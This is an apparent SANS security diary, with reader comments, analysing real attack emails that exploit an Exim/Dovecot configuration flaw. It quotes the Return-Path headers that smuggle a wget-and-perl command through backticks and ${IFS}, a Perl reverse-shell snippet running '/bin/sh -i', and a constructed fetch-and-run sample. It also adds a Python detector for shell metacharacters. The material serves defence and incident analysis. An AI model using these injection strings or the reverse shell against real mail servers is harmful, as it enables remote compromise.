Dovecot / Exim Exploit Detects

Published: 2013-07-29
Last Updated: 2013-07-29 01:57:40 UTC
by Johannes Ullrich (Version: 1)
3 comment(s)

Sometimes it doesn't take an IDS to detect an attack; just reading your e-mail will do. Our reader Timo sent along these two e-mails he received, showing exploitation of a recent Dovecot/Exim configuration flaw [1]:

Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
       by [REMOVED]

Return-Path: <x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`>
X-Original-To: postmaster@localhost
Delivered-To: postmaster@localhost
Received: from domain.local ( [])
       by [REMOVED]

The actual exploit happens in the "Return-Path" line. If Exim is used as a mail server, it can be configured to "pipe" messages to an external program in order to allow for more advanced delivery and filtering options. A common configuration includes the mail delivery agent Dovecot, which implements a POP3 and IMAP server. Sadly, the sample configuration provided to configure Dovecot with Exim passes the string the attacker provided as "MAIL FROM" in the e-mail envelope as a shell parameter without additional validation.
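As an added detection example (not part of the original diary), here is a small Python scanner that flags, in the sender-bearing headers of a message, the shell constructs this exploit relies on (backticks, ${IFS} as a whitespace substitute, command separators) and renders the smuggled command back into readable form for triage. The sample message and the example.invalid host are constructed, not the real indicators.

```python
import re
from email.parser import Parser

# Shell constructs that a legitimate envelope sender never contains but that an
# attacker needs to smuggle a command through a shell-invoked pipe transport.
SHELL_INDICATORS = {
    "backtick_substitution": re.compile(r"`[^`]+`"),
    "dollar_paren_substitution": re.compile(r"\$\([^)]*\)"),
    "ifs_whitespace_smuggling": re.compile(r"\$\{?IFS\}?"),
    "command_separator": re.compile(r"[;|&]"),
}
ADDRESS_HEADERS = ("Return-Path", "From", "Sender", "Reply-To")


def _address_part(value):
    """Return the address inside <...> when present, else the trimmed value."""
    m = re.search(r"<([^>]*)>", value)
    return m.group(1) if m else value.strip()


def find_shell_injection(raw_message):
    """Scan the sender-bearing headers of one message for shell metacharacters.
    Returns (header, indicator, matched_text) triples; an empty list is clean."""
    msg = Parser().parsestr(raw_message, headersonly=True)
    hits = []
    for header in ADDRESS_HEADERS:
        for value in msg.get_all(header, []):
            addr = _address_part(value)
            for name, pattern in SHELL_INDICATORS.items():
                m = pattern.search(addr)
                if m:
                    hits.append((header, name, m.group(0)))
    return hits


def render_smuggled_commands(addr):
    """For analyst triage: pull each backtick-quoted command out of the address
    and turn the ${IFS} separators back into plain spaces."""
    return [re.sub(r"\$\{?IFS\}?", " ", c) for c in re.findall(r"`([^`]+)`", addr)]


# Constructed sample modelled on the diary's headers; example.invalid is a
# placeholder, not the real download host.
SAMPLE_MALICIOUS = (
    "Return-Path: <x`wget${IFS}-O${IFS}/tmp/x${IFS}http://example.invalid/x`"
    "`perl${IFS}/tmp/x`>\n"
    "X-Original-To: postmaster@localhost\n"
    "Delivered-To: postmaster@localhost\n\nbody\n"
)
SAMPLE_BENIGN = "Return-Path: <alice@example.org>\nFrom: Alice <alice@example.org>\n\nhi\n"
```

Run `find_shell_injection` over each message in a mail spool or a captured SMTP session; the benign sample yields no hits, the constructed one flags the backtick substitution and the ${IFS} smuggling in Return-Path.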

The first script ("exim") is a little one-liner shell, written in Perl, connecting to port 9 on (reformatted for readability):

use Socket;
# $i and $p hold the remote host and port; their values were removed from this diary
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
    exec("/bin/sh -i");
};

The second script first retrieves a Perl script and then executes it. The Perl script implements a simple IRC client connecting to on port 3303 (right now, this resolves to , but is not responding on port 3303).

For more details, see the write-up by RedTeam Pentesting [2].


Johannes B. Ullrich, Ph.D.
SANS Technology Institute



Quick addition: the {IFS} string replaces the white space. IFS is the Unix environment variable for the separator.
Hi Guys,

shortly after Heise reported this ( the server behind ( got shut down by the hoster (Strato).

On Mon, 29 Jul 2013 17:57:01 +0200 (CEST) I got a new mail ...
Received: from domain.local (unknown [])
for <postmaster@localhost>; Mon, 29 Jul 2013 17:56:35 +0200 (CEST)
Date: Mon, 29 Jul 2013 17:57:01 +0200 (CEST)
From: x`wget${IFS}-O${IFS}/tmp/${IFS}``perl${IFS}/tmp/`
To: undisclosed-recipients:;
The use of IFS is weird. The default value of IFS is the string containing: a space followed by a tab and then a newline.
Would have expected something more like

